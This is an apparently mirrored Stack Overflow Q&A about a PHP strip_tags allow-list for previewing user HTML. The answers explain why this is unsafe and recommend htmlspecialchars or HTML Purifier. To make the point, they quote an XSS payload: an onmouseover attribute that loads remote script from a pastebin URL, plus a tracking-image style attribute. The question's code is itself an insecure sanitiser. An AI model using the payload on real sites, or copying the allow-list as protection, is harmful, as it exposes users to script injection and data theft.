Pergunta

I am creating a Page-Preview before publishing or saving that page. What I have currently encountered that I have forgotten to add <h1> <h2> <h3> etc tags to the allowable list, but I have added them later.

I want to allow ALL HTML tags except the <script> tag, and so far I came up with this list:

public static function tags() {
    return '<p><a><hr><br><table><thead><tbody><tr><td><th><tfoot><span><div><ul><ol><li><img>' .
        '<canvas><video><object><embed><audio><frame><iframe><label><option><select><option>' .
        '<input><textarea><button><form><param><pre><code><small><em><b><u><i><strong><article>' .
        '<aside><bdi><details><summary><figure><figcaption><footer><header><hgroup><mark><meter>' .
        '<nav><progress><ruby><rt><rp><section><time><wbr><track><source><datalist><output><keygen>' .
        '<h1><h2><h3><h4><h5><h6><h7><h8><h9>';
}

So I use this static method like this:

$model->content = strip_tags($_POST['contents'], HTML5Custom::tags());

Have I missed any of the tags there?

I was mostly focusing on AVAILABLE tags in HTML5 specification, and all HTML4 (and lower) tags which are deprecated in HTML5 are not in the list.

Foi útil?

Solução

Please don't use strip_tags, it is unsafe, and unreliable - read the following discussion on strip_tags for what you should use:

Strip_tags discussion on reddit.com

:: Details of Reddit post ::

strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:

  1. It can eat legitimate text. It turns "This shows that x<y." into "This shows that x", and unless it gets a closing '>' it will continue to eat the rest of the lines in the comment. (It prevents people from discussing HTML, for example.)
  2. It doesn't prevent typed HTML entities. People can (and do) exploit that to bypass word filters & spam filters.
  3. Using the second parameter to allow some tags is 100% dangerous. It starts out innocently: someone wants to permit simple formatting in user comments and does something like this:

What everyone should know about strip_tags()

strip_tags is one of the common go-to functions used for making user input on web pages safe for display. But contrary to what it sounds like it's for, strip_tags is never, ever, ever the right function to use for this and it has a lot of problems. Here's why:

  • It can eat legitimate text. It turns "This shows that x<y." into "This shows that x", and unless it gets a closing '>' it will continue to eat the rest of the lines in the comment. (It prevents people from discussing HTML, for example.)

  • It doesn't prevent typed HTML entities. People can (and do) exploit that to bypass word filters & spam filters.

  • Using the second parameter to allow some tags is 100% dangerous. It starts out innocently: someone wants to permit simple formatting in user comments and does something like this:

    $message = strip_tags($message, '');

But attributes on tags aren't removed. So I could come to your site and post a comment like this:

<b style="color:red;font-size:100pt;text-decoration:blink">hello</b>

Suddenly I can use whatever formatting I want. Or I could do this:

<b style="background:url(http://someserver/transparent.gif);font-weight:normal">hello</b>

Using that I can track users browsing your site without them or you knowing.

Or if I was particularly evil, I could do something like this:

<b onmouseover="s=document.createElement('script');s.src='http://pastebin.com/raw.php?i=j1Vhq2aJ';document.getElementsByTagName('head')[0].appendChild(s)">hello</b>

Using that I could inject my own script into your site, triggered by somebody's cursor moving over my comment. Such a script would run in the user's browser with the full privileges of the page, so it is very dangerous. It could steal or delete private user data. It could alter any part of the page, such as to display fake messages or shock images. It could exploit your site's reputation to trick users into downloading malware. A single comment could even spread across the site rapidly, virally by submitting new comments from the user who views it.

You can't overstate the danger of using that second parameter. If someone cared enough, it could be leveraged to wreak total havoc.

The second parameter doesn't work decently even for known safe text. Usage like strip_tags('text in which we want line breaks<br/>but no formatting', '<br>') still strips the break because it sees the '/' as part of the tag name.

If you simply want to prevent HTML and formatting in user-submitted input, to display text on a web page exactly as typed, the correct function is htmlspecialchars. Follow that with nl2br if you want to display multiple lines, otherwise the text will appear on one line. (++Edit: You should know what character set you're using (and if you don't, aim to use UTF-8 everywhere as it's becoming a web standard). If you're using a weird not-ASCII-compatible character set, you must specify that as the second parameter to htmlspecialchars for it to work properly.)

For when you want to allow formatting, there are proper pre-designed libraries out there for allowing safe use of various syntaxes, including HTML, Markdown, BBCode, and Wikitext.

For when you want to permit formatting, you should use a proper library designed for doing this. Markdown (as used on Reddit) is a user-friendly formatting syntax, but as flyingfirefox has explained below, it allows HTML and is not safe on its own. (It is a formatter and not a sanitizer). Use of HTML and/or Markdown for formatting can be made fully safe with a sanitizer like HTML Purifier, which does what strip_tags was supposed to do. BBCode is another option.

If you feel the need to make your own formatter, even a simple one, look at existing implementations to see what they do because there are a surprising number of subtleties involved in making them reliable and safe.

The only appropriate time to use strip_tags would be to remove HTML that was supposed to be there, and now you're converting to a non-HTML format. For example, if you have some content formatted as HTML and now you want to write it to a plain text file, then using strip_tags, followed by htmlspecialchars_decode or html_entity_decode will do that. (In this case, strip_tags won't have the flaw of removing legitimate text because the text should have already been properly escaped as entities when it was made into HTML in the first place.)

Generally, strip_tags is just the wrong function. Never use it. And if you do, absolutely never use the second parameter, because sooner or later someone will abuse it.

Outras dicas

In this case it's going to be easier to blacklist as opposed to whitelist, otherwise you'll have to constantly revisit this script and update it.

Also, strip_tags() is unreliable for making HTML safe, it's still possible to inject javascript in attributes eg onmouseover="alert('hax'); and it will get past strip_tags() just fine.

My go-to library for HTML filtering/sanitation is HTML Purifier.

Licenciado em: CC-BY-SA com atribuição
Não afiliado a StackOverflow
scroll top